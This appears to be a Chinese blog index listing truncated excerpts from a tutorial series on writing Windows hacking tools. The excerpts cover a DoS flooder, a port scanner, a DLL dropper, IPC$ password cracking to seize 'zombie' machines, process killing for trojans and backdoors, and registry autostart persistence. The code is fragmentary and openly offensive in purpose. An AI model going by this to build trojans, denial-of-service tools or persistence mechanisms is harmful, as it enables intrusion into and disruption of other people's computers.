摘要:
#include #include #define MAXBUFLEN 20480 #define HTTPADDLEN 50 #define TIMEWAIT 2000 #pragma comment(lib,"ws2_32.lib")SOCKET Global[1000]; DWORD WINAPI Proxy( LPVOID pSocket); int ParseHttpRequest(char * SourceBuf,int DataLen,void * ServerAddr); int main(int argc,char * argv[]) { ... 阅读全文
摘要:
// resource.h#define RC_BINARYTYPE 256#define ID_MAGICDEL_DLL 100 DLL文件: #include #include#include "resource.h" void WriteResourceToFile(char const *filename){ HINSTANCE hInstance=GetModuleHandle(NULL); HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL), ... 阅读全文
摘要:
DOS基本原理相信大家都已经很熟悉了,DOS工具大家也用的很熟悉.在群里 经常有人说什么时候去DOS什么东西. 现在我们就自己编写一个DOS工具. #include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839 int threadnum,maxthread,port;char *DestIP; //目标IP void display(void) // 定义状态提示函数 { static int play=0;// 进度条 char *plays[12]= { " 阅读全文
摘要:
#include #include#include //计时需要用到的头文件#pragma comment(lib,"ws2_32.lib") #include //计时需要用到的头文件clock_t start,end; //程序运行的起始和结束时间float costtime; //程序耗时void usage(void){printf("\tusage: tcpscan RemoteIP StartPort-EndPort\n");printf("\tExample: tcpscan 192.168.1.1 80-100\n") 阅读全文
摘要:
木马程序一般都能获得系统详细信息,下面的代码获得计算机名,内存容量,驱动器类型: #include#include void GetSysInfo(); DWORD GetOS() { OSVERSIONINFO os; os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); GetVersionEx(&os); switch(os.dwPlatformId) { case VER_PLATFORM_WIN32_WINDOWS: return VER_PLATFORM_WIN32_WINDOWS; case VER_PLATFORM_WIN32_NT 阅读全文
摘要:
我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码. 我们看一下代码: #include #include #include #pragma comment (lib, "Mpr.lib")#pragma comment (lib, "Netapi32.lib") void getuser(char *); void main( int argc, char *argv[ ] ){ //空用户名和密码DWORD ret;char username[100] = "", 阅读全文
摘要:
第十节 查杀进程 我们在编写木马和后门程序时,列出和查杀进程是非常重要的.列出进程我们使用palist函数:void pslist(void) { HANDLE hProcessSnap = NULL; PROCESSENTRY32 pe32= {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == (HANDLE)-1) { printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError()); 阅读全文
摘要:
第九节 进程创建 我们使用CreateProcess来创建进程.我们先看一下函数原形:BOOL CreateProcess(LPCTSTR LPApplicationName, //可执行模块名 LPTSTR lpCommandLine, //命令字符串 LPSECURITY_ATTRIBUTES lpProcessAttributes, //线程安全属性 LPSECURITY_ATTRIBUTES lpThr... 阅读全文
摘要:
第七节 程序从注册表自启动 先向大家介绍能让WINDOWS自动启动的2个文件和8个注册键1: 当前用户专用的启动文件夹 将快捷方式放入WINDOWS的用户启动文件夹中. 路径:系统盘:\Document and Settings\\"开始"\程序\启动2:所有用户的启动文件夹 路径:系统盘:\Document and Settings\ALL USER\"开始"\程序\启动以下是注册键,均可以通过注册表直接搜索得到3:LOAD注册键4:USERINIT注册键5:EXPLORER\RUN注册键6:RUNSERVICESONCE注册键7:RUNSERVICE 阅读全文
摘要:
先介绍一下什么是NT服务,实际上就是一个可以在系统启动时自动在一定身份下启动的,伴随着系统长期存在的进程. 一个NT服务有三部分构成: 1:Service Control Manager(SCM) 每个WIN NT/2K都有一个SCM,他存在于Service.exe中. 2:服务本身 一个服务拥有能从SCM受到信号和命令所必需的特殊代码,并能够在处理后将他的状态返回SCM. 3:Service Control Dispatcher(SCP) 他是一个拥有用户截面,允许用户开始,暂停,继续,并且控制已经安装在计算机上作为服务运行的WIN32 应用程序下面我们来看编写一个NT... 阅读全文